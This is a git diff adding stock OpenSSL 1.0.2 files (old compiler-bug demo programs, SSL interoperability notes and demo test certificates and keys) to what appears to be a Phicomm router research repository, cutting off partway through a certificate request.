zG8+BOz`qN2?gWnW=P!Wc{odaL$9Z)x@E5`Uarv}E8~YRI&(nb8{5cai&Yw$x<NUc2
zcrTS<+Iu<hCxPECocjg+d>80Pf!`hiegyEX4m&$QkMr%T!0|rPka1KI+U)w|0Kb8b
zn|9?1A4UxO{YcPby9$7R3+zk*{%zprgMFNzn?R5D<G^nOJ6{7kSkG&L^Rw}$UAF+o
z`SusU`8Q&X{wd(2fxilze|yyE4?LMFM;rU?7~oTZ9}B!(IQPp<^fGqN0X?>BG3ajw
z{lyObe*ouyRBY`34)}4vKLUO{@O{AfH&u<Dyi=$Wv~m5vLodT81LyA`82(k^?4J{W
zF9kjJdkyegz<vYRLH}G1dbG11_(rgEjl<6Mphr75fgZ=*oKwjtZT9#&S2(x#L}>3q
z;3olJ20R~l9dQ2bTI0_q2VV{RWYDhz&fftscCG<l0Q}nyej9KcNB21RCI^2C_^D9t
zZ-8Sx{{S54w?7LXPktT`cHRa(|F*Ab?<Wp^5F4P4`)eP+<a;#bz$btm*78P(e$CMH
zHe~aj=gC`|-yvY6KAh%n3LkCpi3e%mTf9zqfyHkSUTpDR;iVRTUwE0t{TvO#7OxUs
zW$`P7S6lo6;ma-lj_?MHk3Lv~R*ReGP1`MgmFU-5`~l(DSp2ubZ?O31!Z%uc><A6+
zw77Y`^FE6wMZd}7cME^S;=dQ(Yw>>x-(m4dhiLG;#g_};W$|l;zix5!oZ@baAC#-X
z9*djj|MpsZmFQI<(=ikO|0$f;RJ<Afl5k$rA|IKj_xaq4{B+^I#k+*_9EJK9g%?}A
zUwEm-PaCQ8msvb2JZy3ETvwIF-xhtf#ZNd?+h1<+6~Y@Vez)*ei<{?-+AaQ`=+{|%
z++n)hYb;(R{057+3*Tt*Ukbm|;@O95`}bLVk?>6xzee~Y7XPL2UW@-z_zsJYAEnFn
z^_x1+^10S*Rgz%Fulvn`qWIe8M9m8N|C@<6{oY_wZPBKhBK2R8i|C)q)p$iK;&HF2
zEyg=64;9g`j_6%_XR$g$sUrHCH~khy5&yql`XLUli2iX_w21yc3IB8B+Euc@vL#v6
z+7_c<T}Z4I1JMThqAdR?$N%l-lL2<o0hXaM*<U(--~n-G8uG^he2yzi6P?(7iGF{5
zvVP}b%Xzc)t~XlVc{#{DOZLs%tyZ~)+vQK718mdIf1Bjzy5VN;hv*>NEI|>aP5v5*
z7jxK@Z{Ex30H-mAl=ds??|}bD!o;*+AN9O*DZ%;e`umc9mnldx`0{Sv!j#D5{~dhM
zOj|22CTL^-A4o4#zVZJ>#JGrJdf~RWOz)kBkkY0)=Di*mN>3`sy&!G!8N#2Ha=mQ-
z6-a*H2<6?>-{9*g!8YyuVaflx5z4!rzl(S#|CQdYGZ??H|M-+@@*DqUDw}f_%;dkG
zS2{+&^XcPOdfEAT`DFJ!=U9F*|Mk49<vgzU0{@$Rp1w2XZ;<+LG(vgj`r`IKkx4`%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/MS b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/MS
new file mode 100644
index 0000000..a1dcfb9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/MS
@@ -0,0 +1,7 @@
+If you use the function that does an fopen inside the DLL, it's malloc
+will be used and when the function is then written inside, more
+hassles
+....
+
+
+think about it.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/SSLv3 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/SSLv3
new file mode 100644
index 0000000..a75a165
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/SSLv3
@@ -0,0 +1,49 @@
+So far...
+
+ssl3.netscape.com:443 does not support client side dynamic
+session-renegotiation.
+
+ssl3.netscape.com:444 (asks for client cert) sends out all the CA RDN
+in an invalid format (the outer sequence is removed).
+
+Netscape-Commerce/1.12, when talking SSLv2, accepts a 32 byte
+challenge but then appears to only use 16 bytes when generating the
+encryption keys.  Using 16 bytes is ok but it should be ok to use 32.
+According to the SSLv3 spec, one should use 32 bytes for the challenge
+when opperating in SSLv2/v3 compatablity mode, but as mentioned above,
+this breaks this server so 16 bytes is the way to go.
+
+www.microsoft.com - when talking SSLv2, if session-id reuse is
+performed, the session-id passed back in the server-finished message
+is different from the one decided upon.
+
+ssl3.netscape.com:443, first a connection is established with RC4-MD5.
+If it is then resumed, we end up using DES-CBC3-SHA.  It should be
+RC4-MD5 according to 7.6.1.3, 'cipher_suite'.
+Netscape-Enterprise/2.01 (https://merchant.netscape.com) has this bug.
+It only really shows up when connecting via SSLv2/v3 then reconnecting
+via SSLv3. The cipher list changes....
+NEW INFORMATION.  Try connecting with a cipher list of just
+DES-CBC-SHA:RC4-MD5.  For some weird reason, each new connection uses
+RC4-MD5, but a re-connect tries to use DES-CBC-SHA.  So netscape, when
+doing a re-connect, always takes the first cipher in the cipher list.
+
+If we accept a netscape connection, demand a client cert, have a
+non-self-signed CA which does not have it's CA in netscape, and the
+browser has a cert, it will crash/hang.  Works for 3.x and 4.xbeta
+
+Netscape browsers do not really notice the server sending a
+close notify message.  I was sending one, and then some invalid data.
+netscape complained of an invalid mac. (a fork()ed child doing a
+SSL_shutdown() and still sharing the socket with its parent).
+
+Netscape, when using export ciphers, will accept a 1024 bit temporary
+RSA key.  It is supposed to only accept 512.
+
+If Netscape connects to a server which requests a client certificate
+it will frequently hang after the user has selected one and never
+complete the connection. Hitting "Stop" and reload fixes this and
+all subsequent connections work fine. This appears to be because 
+Netscape wont read any new records in when it is awaiting a server
+done message at this point. The fix is to send the certificate request
+and server done messages in one record.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/alpha.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/alpha.c
new file mode 100644
index 0000000..3b4bc93
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/alpha.c
@@ -0,0 +1,92 @@
+/* bugs/alpha.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * while not exactly a bug (ASN1 C leaves this undefined) it is something to
+ * watch out for.  This was fine on linux/NT/Solaris but not Alpha
+ */
+
+/*-
+ * it is basically an example of
+ * func(*(a++),*(a++))
+ * which parameter is evaluated first?  It is not defined in ASN1 C.
+ */
+
+#include <stdio.h>
+
+#define TYPE    unsigned int
+
+void func(a, b)
+TYPE *a;
+TYPE b;
+{
+    printf("%ld -1 == %ld\n", a[0], b);
+}
+
+main()
+{
+    TYPE data[5] = { 1L, 2L, 3L, 4L, 5L };
+    TYPE *p;
+    int i;
+
+    p = data;
+
+    for (i = 0; i < 4; i++) {
+        func(p, *(p++));
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/dggccbug.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/dggccbug.c
new file mode 100644
index 0000000..56f5222
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/dggccbug.c
@@ -0,0 +1,45 @@
+/* NOCW */
+/* dggccbug.c */
+/* bug found by Eric Young (eay@cryptsoft.com) - May 1995 */
+
+#include <stdio.h>
+
+/*
+ * There is a bug in gcc version 2.5.8 (88open OCS/BCS, DG-2.5.8.3, Oct 14
+ * 1994) as shipped with DGUX 5.4R3.10 that can be bypassed by defining
+ * DG_GCC_BUG in my code. The bug manifests itself by the vaule of a pointer
+ * that is used only by reference, not having it's value change when it is
+ * used to check for exiting the loop.  Probably caused by there being 2
+ * copies of the valiable, one in a register and one being an address that is
+ * passed.
+ */
+
+/*-
+ * compare the out put from
+ * gcc dggccbug.c; ./a.out
+ * and
+ * gcc -O dggccbug.c; ./a.out
+ * compile with -DFIXBUG to remove the bug when optimising.
+ */
+
+void inc(a)
+int *a;
+{
+    (*a)++;
+}
+
+main()
+{
+    int p = 0;
+#ifdef FIXBUG
+    int dummy;
+#endif
+
+    while (p < 3) {
+        fprintf(stderr, "%08X\n", p);
+        inc(&p);
+#ifdef FIXBUG
+        dummy += p;
+#endif
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/sgiccbug.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/sgiccbug.c
new file mode 100644
index 0000000..6b1b3d4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/sgiccbug.c
@@ -0,0 +1,60 @@
+/* NOCW */
+/* sgibug.c */
+/* bug found by Eric Young (eay@mincom.oz.au) May 95 */
+
+#include <stdio.h>
+
+/*
+ * This compiler bug it present on IRIX 5.3, 5.1 and 4.0.5 (these are the
+ * only versions of IRIX I have access to. defining FIXBUG removes the bug.
+ * (bug is still present in IRIX 6.3 according to Gage
+ * <agage@forgetmenot.Mines.EDU>
+ */
+
+/*-
+ * Compare the output from
+ * cc sgiccbug.c; ./a.out
+ * and
+ * cc -O sgiccbug.c; ./a.out
+ */
+
+static unsigned long a[4] =
+    { 0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210 };
+static unsigned long b[4] =
+    { 0x89ABCDEF, 0xFEDCBA98, 0x76543210, 0x01234567 };
+static unsigned long c[4] =
+    { 0x77777778, 0x8ACF1357, 0x88888888, 0x7530ECA9 };
+
+main()
+{
+    unsigned long r[4];
+    sub(r, a, b);
+    fprintf(stderr, "input a= %08X %08X %08X %08X\n", a[3], a[2], a[1], a[0]);
+    fprintf(stderr, "input b= %08X %08X %08X %08X\n", b[3], b[2], b[1], b[0]);
+    fprintf(stderr, "output = %08X %08X %08X %08X\n", r[3], r[2], r[1], r[0]);
+    fprintf(stderr, "correct= %08X %08X %08X %08X\n", c[3], c[2], c[1], c[0]);
+}
+
+int sub(r, a, b)
+unsigned long *r, *a, *b;
+{
+    register unsigned long t1, t2, *ap, *bp, *rp;
+    int i, carry;
+#ifdef FIXBUG
+    unsigned long dummy;
+#endif
+
+    ap = a;
+    bp = b;
+    rp = r;
+    carry = 0;
+    for (i = 0; i < 4; i++) {
+        t1 = *(ap++);
+        t2 = *(bp++);
+        t1 = (t1 - t2);
+#ifdef FIXBUG
+        dummy = t1;
+#endif
+        *(rp++) = t1 & 0xffffffff;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/sslref.dif b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/sslref.dif
new file mode 100644
index 0000000..0aa92bf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/sslref.dif
@@ -0,0 +1,26 @@
+The February 9th, 1995 version of the SSL document differs from
+https://www.netscape.com in the following ways.
+=====
+The key material for generating a SSL_CK_DES_64_CBC_WITH_MD5 key is
+KEY-MATERIAL-0 = MD5[MASTER-KEY,"0",CHALLENGE,CONNECTION-ID]
+not
+KEY-MATERIAL-0 = MD5[MASTER-KEY,CHALLENGE,CONNECTION-ID]
+as specified in the documentation.
+=====
+From the section 2.6 Server Only Protocol Messages
+
+If the SESSION-ID-HIT flag is non-zero then the CERTIFICATE-TYPE,
+CERTIFICATE-LENGTH and CIPHER-SPECS-LENGTH fields will be zero. 
+
+This is not true for https://www.netscape.com.  The CERTIFICATE-TYPE
+is returned as 1.
+=====
+I have not tested the following but it is reported by holtzman@mit.edu.
+
+SSLref clients wait to recieve a server-verify before they send a
+client-finished.  Besides this not being evident from the examples in
+2.2.1, it makes more sense to always send all packets you can before
+reading.  SSLeay was waiting in the server to recieve a client-finish
+before sending the server-verify :-).  I have changed SSLeay to send a
+server-verify before trying to read the client-finished.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/stream.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/stream.c
new file mode 100644
index 0000000..9af2395
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/stream.c
@@ -0,0 +1,132 @@
+/* bugs/stream.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/rc4.h>
+#ifdef OPENSSL_NO_DES
+# include <des.h>
+#else
+# include <openssl/des.h>
+#endif
+
+/*
+ * show how stream ciphers are not very good.  The mac has no affect on RC4
+ * while it does for cfb DES
+ */
+
+main()
+{
+    fprintf(stderr, "rc4\n");
+    rc4();
+    fprintf(stderr, "cfb des\n");
+    des();
+}
+
+int des()
+{
+    des_key_schedule ks;
+    des_cblock iv, key;
+    int num;
+    static char *keystr = "01234567";
+    static char *in1 = "0123456789ABCEDFdata 12345";
+    static char *in2 = "9876543210abcdefdata 12345";
+    unsigned char out[100];
+    int i;
+
+    des_set_key((des_cblock *)keystr, ks);
+
+    num = 0;
+    memset(iv, 0, 8);
+    des_cfb64_encrypt(in1, out, 26, ks, (des_cblock *)iv, &num, 1);
+    for (i = 0; i < 26; i++)
+        fprintf(stderr, "%02X ", out[i]);
+    fprintf(stderr, "\n");
+
+    num = 0;
+    memset(iv, 0, 8);
+    des_cfb64_encrypt(in2, out, 26, ks, (des_cblock *)iv, &num, 1);
+    for (i = 0; i < 26; i++)
+        fprintf(stderr, "%02X ", out[i]);
+    fprintf(stderr, "\n");
+}
+
+int rc4()
+{
+    static char *keystr = "0123456789abcdef";
+    RC4_KEY key;
+    unsigned char in[100], out[100];
+    int i;
+
+    RC4_set_key(&key, 16, keystr);
+    in[0] = '\0';
+    strcpy(in, "0123456789ABCEDFdata 12345");
+    RC4(key, 26, in, out);
+
+    for (i = 0; i < 26; i++)
+        fprintf(stderr, "%02X ", out[i]);
+    fprintf(stderr, "\n");
+
+    RC4_set_key(&key, 16, keystr);
+    in[0] = '\0';
+    strcpy(in, "9876543210abcdefdata 12345");
+    RC4(key, 26, in, out);
+
+    for (i = 0; i < 26; i++)
+        fprintf(stderr, "%02X ", out[i]);
+    fprintf(stderr, "\n");
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/ultrixcc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/ultrixcc.c
new file mode 100644
index 0000000..6e24549
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/bugs/ultrixcc.c
@@ -0,0 +1,44 @@
+#include <stdio.h>
+
+/*-
+ * This is a cc optimiser bug for ultrix 4.3, mips CPU.
+ * What happens is that the compiler, due to the (a)&7,
+ * does
+ * i=a&7;
+ * i--;
+ * i*=4;
+ * Then uses i as the offset into a jump table.
+ * The problem is that a value of 0 generates an offset of
+ * 0xfffffffc.
+ */
+
+main()
+{
+    f(5);
+    f(0);
+}
+
+int f(a)
+int a;
+{
+    switch (a & 7) {
+    case 7:
+        printf("7\n");
+    case 6:
+        printf("6\n");
+    case 5:
+        printf("5\n");
+    case 4:
+        printf("4\n");
+    case 3:
+        printf("3\n");
+    case 2:
+        printf("2\n");
+    case 1:
+        printf("1\n");
+#ifdef FIX_BUG
+    case 0:
+        ;
+#endif
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/README.RootCerts b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/README.RootCerts
new file mode 100644
index 0000000..c760b61
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/README.RootCerts
@@ -0,0 +1,4 @@
+The OpenSSL project does not (any longer) include root CA certificates.
+
+Please check out the FAQ:
+  * How can I set up a bundle of commercial root CA certificates?
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/3f77a2b5.0 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/3f77a2b5.0
new file mode 120000
index 0000000..188face
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/3f77a2b5.0
@@ -0,0 +1 @@
+ca-cert.pem
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/ca-cert.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/ca-cert.pem
new file mode 100644
index 0000000..bcba68a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/ca-cert.pem
@@ -0,0 +1,33 @@
+-----BEGIN CERTIFICATE-----
+MIIC5TCCAk6gAwIBAgIBATANBgkqhkiG9w0BAQQFADBcMQswCQYDVQQGEwJBVTET
+MBEGA1UECBMKUXVlZW5zbGFuZDEaMBgGA1UEChMRQ3J5cHRTb2Z0IFB0eSBMdGQx
+HDAaBgNVBAMTE1Rlc3QgUENBICgxMDI0IGJpdCkwHhcNOTkxMjAyMjEzODUxWhcN
+MDUwNzEwMjEzODUxWjBbMQswCQYDVQQGEwJBVTETMBEGA1UECBMKUXVlZW5zbGFu
+ZDEaMBgGA1UEChMRQ3J5cHRTb2Z0IFB0eSBMdGQxGzAZBgNVBAMTElRlc3QgQ0Eg
+KDEwMjQgYml0KTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAo7ujy3XXpU/p
+yDJtOxkMJmGv3mdiVm7JrdoKLUgqjO2rBaeNuYMUiuI6oYU+tlD6agwRML0Pn2JF
+b90VdK/UXrmRr9djaEuH17EIKjte5RwOzndCndsjcCYyoeODMTyg7dqPIkDMmRNM
+5R5xBTabD+Aji0wzQupYxBLuW5PLj7ECAwEAAaOBtzCBtDAdBgNVHQ4EFgQU1WWA
+U42mkhi3ecgey1dsJjU61+UwgYQGA1UdIwR9MHuAFE0RaEcrj18q1dw+G6nJbsTW
+R213oWCkXjBcMQswCQYDVQQGEwJBVTETMBEGA1UECBMKUXVlZW5zbGFuZDEaMBgG
+A1UEChMRQ3J5cHRTb2Z0IFB0eSBMdGQxHDAaBgNVBAMTE1Rlc3QgUENBICgxMDI0
+IGJpdCmCAQAwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQQFAAOBgQBb39BRphHL
+6aRAQyymsvBvPSCiG9+kR0R1L23aTpNbhXp2BebyFjbEQYZc2kWGiKKcHkNECA35
+3d4LoqUlVey8DFyafOIJd9hxdZfg+rxlHMxnL7uCJRmx9+xB411Jtsol9/wg1uCK
+sleGpgB4j8cG2SVCz7V2MNZNK+d5QCnR7A==
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIICXQIBAAKBgQCju6PLddelT+nIMm07GQwmYa/eZ2JWbsmt2gotSCqM7asFp425
+gxSK4jqhhT62UPpqDBEwvQ+fYkVv3RV0r9ReuZGv12NoS4fXsQgqO17lHA7Od0Kd
+2yNwJjKh44MxPKDt2o8iQMyZE0zlHnEFNpsP4COLTDNC6ljEEu5bk8uPsQIDAQAB
+AoGAVZmpFZsDZfr0l2S9tLLwpjRWNOlKATQkno6q2WesT0eGLQufTciY+c8ypfU6
+hyio8r5iUl/VhhdjhAtKx1mRpiotftHo/eYf8rtsrnprOnWG0bWjLjtIoMbcxGn2
+J3bN6LJmbJMjDs0eJ3KnTu646F3nDUw2oGAwmpzKXA1KAP0CQQDRvQhxk2D3Pehs
+HvG665u2pB5ipYQngEFlZO7RHJZzJOZEWSLuuMqaF/7pTfA5jiBvWqCgJeCRRInL
+21ru4dlPAkEAx9jj7BgKn5TYnMoBSSe0afjsV9oApVpN1Nacb1YDtCwy+scp3++s
+nFxlv98wxIlSdpwMUn+AUWfjiWR7Tu/G/wJBAJ/KjwZIrFVxewP0x2ILYsTRYLzz
+MS4PDsO7FB+I0i7DbBOifXS2oNSpd3I0CNMwrxFnUHzynpbOStVfN3ZL5w0CQQCa
+pwFahxBRhkJKsxhjoFJBX9yl75JoY4Wvm5Tbo9ih6UJaRx3kqfkN14L2BKYcsZgb
+KY9vmDOYy6iNfjDeWTfJAkBkfPUb8oTJ/nSP5zN6sqGxSY4krc4xLxpRmxoJ8HL2
+XfhqXkTzbU13RX9JJ/NZ8vQN9Vm2NhxRGJocQkmcdVtJ
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/cbdbd8bc.0 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/cbdbd8bc.0
new file mode 120000
index 0000000..a9489a2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/cbdbd8bc.0
@@ -0,0 +1 @@
+dsa-ca.pem
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/de4fa23b.0 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/de4fa23b.0
new file mode 120000
index 0000000..f005abd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/de4fa23b.0
@@ -0,0 +1 @@
+dsa-pca.pem
\ No newline at end of file
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/dsa-ca.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/dsa-ca.pem
new file mode 100644
index 0000000..9eb08f3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/certs/demo/dsa-ca.pem
@@ -0,0 +1,43 @@
+-----BEGIN DSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: DES-EDE3-CBC,C5B6C7CC9E1FE2C0
+
+svCXBcBRhMuU22UXOfiKZA+thmz6KYXpt1Yg5Rd+TYQcQ1MdvNy0B0tkP1SxzDq0
+Xh1eMeTML9/9/0rKakgNXXXbpi5RB8t6BmwRSyej89F7nn1mtR3qzoyPRpp15SDl
+Tn67C+2v+HDF3MFk88hiNCYkNbcmi7TWvChsl8N1r7wdZwtIox56yXdgxw6ZIpa/
+par0oUCzN7fiavPgCWz1kfPNSaBQSdxwH7TZi5tMHAr0J3C7a7QRnZfE09R59Uqr
+zslrq+ndIw1BZAxoY0SlBu+iFOVaBVlwToC4AsHkv7j7l8ITtr7f42YbBa44D9TO
+uOhONmkk/v3Fso4RaOEzdKZC+hnmmzvHs6TiTWm6yzJgSFwyOUK0eGmKEeVxpcH5
+rUOlHOwzen+FFtocZDZAfdFnb7QY7L/boQvyA5A+ZbRG4DUpmBQeQsSaICHM5Rxx
+1QaLF413VNPXTLPbW0ilSc2H8x2iZTIVKfd33oSO6NhXPtSYQgfecEF4BvNHY5c4
+HovjT4mckbK95bcBzoCHu43vuSQkmZzdYo/ydSZt6zoPavbBLueTpgSbdXiDi827
+MVqOsYxGCb+kez0FoDSTgw==
+-----END DSA PRIVATE KEY-----
+-----BEGIN CERTIFICATE REQUEST-----
+MIICUjCCAhECAQAwUjELMAkGA1UEBhMCQVUxEzARBgNVBAgTClNvbWUtU3RhdGUx
+ITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDELMAkGA1UEAxMCQ0Ew
+ggG0MIIBKQYFKw4DAgwwggEeAoGBAKc/boW/QWopffCfRxkwkJoJHdpqMx7FPYaW
+sxXgUy6P4FmCc5A+dTGZR3pS+4Xk2aZ7OJtoioSbh8YetX6GS1NbWc9xZRmIbs5m
+rmuINvvsKNzC16W75Sw5JkvamnAYlTeVEFYj9hXtugRe3jlP/bdDH7WkZW/NgBHk
+cJVbUM1JAhUA9wcx7fpsBgPVhYocrJxl51BmZW8CgYBN30wDppGK9RlvUEYlmeVo
+bzDjaeHls12YuyiGSPzemQQ/X4gMnHMkDSBduSqaPxiWJ+Rih8F7dGJT/GEnqHqR
+CZ228U2cVA9YBu5JdAfOVX4jzhb2ytxaYQF+yXG1TfbcNCmHaPZeIJOz2/XkCWxB
+F5WS6wG1c6Vqftgy7Q4CuAOBhAACgYAapll6iqz9XrZFlk2GCVcB+KihxWnH7IuH
